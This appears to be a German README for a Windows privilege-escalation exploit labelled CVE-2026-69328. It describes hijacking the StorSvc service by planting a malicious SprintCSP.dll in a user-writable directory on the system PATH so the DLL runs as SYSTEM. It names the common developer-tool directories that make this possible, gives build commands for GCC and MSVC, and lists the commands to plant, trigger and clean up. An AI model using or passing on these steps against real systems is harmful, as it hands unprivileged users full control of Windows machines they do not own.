
Windows-Privilege-Escalation-Exploit, der SprintCSP.dll in einem benutzerbeschreibbaren HKLM-PATH-Verzeichnis platziert, um StorSvc zu hijacken und als SYSTEM auszuführen.
StorSvc lädt SprintCSP.dll über den relativen Namen als SYSTEM. Platziere sie in einem benutzerbeschreibbaren HKLM-PATH-Verzeichnis und erhalte SYSTEM.
Erfordert ein benutzerbeschreibbares Verzeichnis in HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path.
Keine auf einem sauberen Image. Tooling-Installer fügen sie hinzu (%USERPROFILE%\.cargo\bin, .local\bin, Python Scripts). Wenn die Box keine hat, erstellt CVE-2026-69328.exe --setup eine, was eine einmalige Admin-Abfrage erfordert. Der Exploit selbst benötigt nie Admin.
GCC:
gcc payload.c -shared -o SprintCSP.dll
gcc CVE-2026-69328.c -lrpcrt4 -ladvapi32 -lshell32 -o CVE-2026-69328.exe
MSVC:
cl /LD payload.c /Fe:SprintCSP.dll
cl CVE-2026-69328.c rpcrt4.lib advapi32.lib shell32.lib /Fe:CVE-2026-69328.exe
CVE-2026-69328.exe plant, trigger, read proof
CVE-2026-69328.exe --cleanup remove proof file + planted DLL
Der Nachweis landet unter C:\Windows\System32\CVE-2026-69328.txt.
StorSvc stürzt nach dem Laden ab und SCM startet es nach ~120s neu.